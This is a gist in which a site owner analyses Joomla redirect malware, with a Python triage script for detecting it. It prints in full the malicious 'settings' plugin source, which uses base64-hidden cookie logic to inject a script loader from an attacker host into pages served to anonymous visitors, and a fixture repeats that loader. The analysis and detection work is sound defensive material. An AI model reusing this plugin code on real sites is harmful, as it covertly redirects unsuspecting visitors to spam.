@mrl22
Last active April 7, 2023 15:58
Joomla Redirection Malware Fix - Is your Joomla site randomly redirecting to spam sites?

I found this webpage useful to start with: https://www.getastra.com/blog/911/joomla-malicious-redirects/

My next step was to see if I could get the source code for the redirect as it happened. I used https://www.view-page-source.com/ to get the source code anonymously, hoping it would trigger, and it did!

The malware injected the following into the head:

<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script>
var khutmhpx = document.createElement("script");
khutmhpx.src = "https://[URL-REMOVED]";
document.getElementsByTagName("head")[0].appendChild(khutmhpx);
</script>

I then searched the whole Joomla PHP source code for "khutmhpx" and found a Joomla plugin called "settings", located at "plugins/system/settings/settings.php", which had been installed and activated. Looking at the initialisation of this plugin, its only purpose was the following:

<?php

/**
 * @Enterprise: Joomla! Project
 * @author: Joomla! Project
 * @url: http://www.github.com
 * @license: GNU/GPLv3 http://www.gnu.org/licenses/gpl-3.0.html
 * @copyright: github.com
 *
 * Custom settings plugin;
 * https://github.com
 * License: MIT License
 */

defined('_JEXEC') or die;

class plgSystemSettings extends JPlugin
{
	// System plugin hook: runs on every request, front end and back end, before routing.
	public function onAfterInitialise()
	{
		$user = JFactory::getUser();
		$mainframe = JFactory::getApplication(); // fetched but never used
		if ( $user -> id > 0 ) {
			// user route: logged-in visitors never receive the payload
		} else {
			// non-user route
			$current_url = JUri::getInstance();
			// case-insensitive substring match on the whole URL, so "/administrator" is covered too
			if (stristr($current_url, "/admin")) {
				// admin-panel route
			} else {
				// 'cl9vaw==' decodes to "r_ok": the cookie that marks a browser as already served
				if ( ! isset( $_COOKIE[base64_decode('cl9vaw==')]) ) {
					// 'Lw==' decodes to "/": set r_ok=1 for the whole site, expiring in 86400 s (1 day)
					setcookie( base64_decode( 'cl9vaw==' ), 1, time() + 86400, base64_decode( 'Lw==' ) );
					// first tag is a genuine jQuery copy from the public CDN (cover);
					// the second appends a loader <script> pointing at the attacker's URL
					echo '<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script>
var khutmhpx = document.createElement("script");
khutmhpx.src = "https://[URL-REMOVED]";
document.getElementsByTagName("head")[0].appendChild(khutmhpx);
</script>
';
				}
			}
		}
	}
}

To summarise what this code is doing:

IF:

  1. The visitor is not logged in (JFactory::getUser()->id is 0).
  2. The request URL does not contain "/admin" (a case-insensitive substring check on the full URL, so "/administrator" is excluded as well).
  3. The cookie "r_ok" is not present (its name is hidden as the base64 string 'cl9vaw==').

THEN:

  1. Set the cookie r_ok=1 for path "/" (base64 'Lw=='), expiring in 86400 seconds, i.e. 1 day.
  2. Inject JavaScript into the head of the page: a genuine jQuery include from code.jquery.com as cover, followed by a loader that appends a second <script> element whose src is the attacker's URL.

The script loaded from the attacker's URL contains the actual redirect, so the destination can be changed on the attacker's side at any time without touching the compromised site. The three conditions also explain why the redirect is hard to reproduce: the site owner is normally logged in, and any other browser is hit at most once a day, so a fresh session with no cookies (or an anonymous fetch) is the reliable way to trigger it.
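The hunt described on this page, as an added Python example (my code, not the gist author's): it pulls the script sources out of a captured page so the loader's variable name can be grepped for, then walks a Joomla plugins/ tree scoring each PHP file for the traits of the plugin above and decoding any base64_decode('...') literals it finds. The fixture site, the placeholder loader URL https://loader.example.invalid/x.js, and the indicator names are constructed for the example.

```python
import base64
import os
import re
import tempfile

# <script ... src="..."> tags (static includes such as the jQuery CDN copy).
STATIC_SRC_RE = re.compile(r'<script\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.I)
# The loader pattern from the page: <variable>.src = "https://..."
DYNAMIC_SRC_RE = re.compile(r'\b(\w+)\.src\s*=\s*["\']([^"\']+)["\']')
# base64_decode('...') with a string literal argument.
B64_CALL_RE = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def extract_script_sources(html):
    """Return (static_urls, [(variable, url), ...]) for scripts in a captured page.
    The variable of a dynamically appended script (here "khutmhpx") is the grep target."""
    return STATIC_SRC_RE.findall(html), DYNAMIC_SRC_RE.findall(html)


def decode_b64_literals(php_source):
    """Map each base64_decode('...') literal in a file to its decoded text."""
    out = {}
    for literal in B64_CALL_RE.findall(php_source):
        try:
            out[literal] = base64.b64decode(literal, validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError
            out[literal] = "<undecodable>"
    return out


# Traits of the plugin on this page; several together are a strong signal.
INDICATORS = {
    "frontend_init_hook": re.compile(r"onAfterInitialise"),    # runs on every request
    "guest_only": re.compile(r"->\s*id\s*>\s*0"),                # skips logged-in users
    "obfuscated_cookie_gate": re.compile(r"\$_COOKIE\[\s*base64_decode"),
    "sets_cookie": re.compile(r"\bsetcookie\s*\("),
    "echoes_script_tag": re.compile(r"echo\s*['\"]\s*<script", re.I),
    "base64_literals": B64_CALL_RE,
}


def score_plugin_file(php_source):
    """Return the sorted indicator names present in one PHP source."""
    return sorted(n for n, rx in INDICATORS.items() if rx.search(php_source))


def scan_plugins_dir(joomla_root, min_hits=3):
    """Walk <root>/plugins; return {relative_path: indicators} for files with >= min_hits."""
    findings = {}
    for dirpath, _dirs, files in os.walk(os.path.join(joomla_root, "plugins")):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                hits = score_plugin_file(fh.read())
            if len(hits) >= min_hits:
                findings[os.path.relpath(full, joomla_root).replace(os.sep, "/")] = hits
    return findings


# Constructed fixtures (not real site data); the loader URL is a placeholder.
CAPTURED_HEAD = """<head>
<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script>
var khutmhpx = document.createElement("script");
khutmhpx.src = "https://loader.example.invalid/x.js";
document.getElementsByTagName("head")[0].appendChild(khutmhpx);
</script></head>"""

MALICIOUS_PLUGIN = r"""<?php
defined('_JEXEC') or die;
class plgSystemSettings extends JPlugin {
    public function onAfterInitialise() {
        $user = JFactory::getUser();
        if ( $user -> id > 0 ) { } else {
            if ( ! isset( $_COOKIE[base64_decode('cl9vaw==')]) ) {
                setcookie( base64_decode( 'cl9vaw==' ), 1, time() + 86400, base64_decode( 'Lw==' ) );
                echo '<script>var khutmhpx = document.createElement("script");
khutmhpx.src = "https://loader.example.invalid/x.js";</script>';
            }
        }
    }
}
"""

BENIGN_PLUGIN = "<?php\ndefined('_JEXEC') or die;\nclass plgSystemBenign extends JPlugin {\n    public function onAfterInitialise() { return true; }\n}\n"


def build_fixture_site():
    """Write the two fixture plugins into a throwaway tree; return its root."""
    root = tempfile.mkdtemp(prefix="joomla-triage-")
    for rel, body in (("plugins/system/settings/settings.php", MALICIOUS_PLUGIN),
                      ("plugins/system/benign/benign.php", BENIGN_PLUGIN)):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


def triage(html=CAPTURED_HEAD, joomla_root=None):
    """Run the whole hunt (fixtures by default); return a summary dict."""
    root = joomla_root or build_fixture_site()
    findings = scan_plugins_dir(root)
    decoded = {}
    for rel in findings:
        with open(os.path.join(root, rel), encoding="utf-8", errors="replace") as fh:
            decoded[rel] = decode_b64_literals(fh.read())
    static, dynamic = extract_script_sources(html)
    return {"static": static, "dynamic": dynamic, "findings": findings, "decoded": decoded}


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value}")
```

Against a real site, call triage(html=captured_source, joomla_root="/path/to/joomla") with page source captured from a fresh, cookieless session. Treat the static jQuery include as legitimate; the dynamic loader URL and the plugin file that echoes it are the indicators. Joomla also records installed plugins in its #__extensions table, so after removing a plugin directory check that its record (and its enabled flag) is gone too.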

To fix, I zipped/backed up the settings directory and then deleted it.
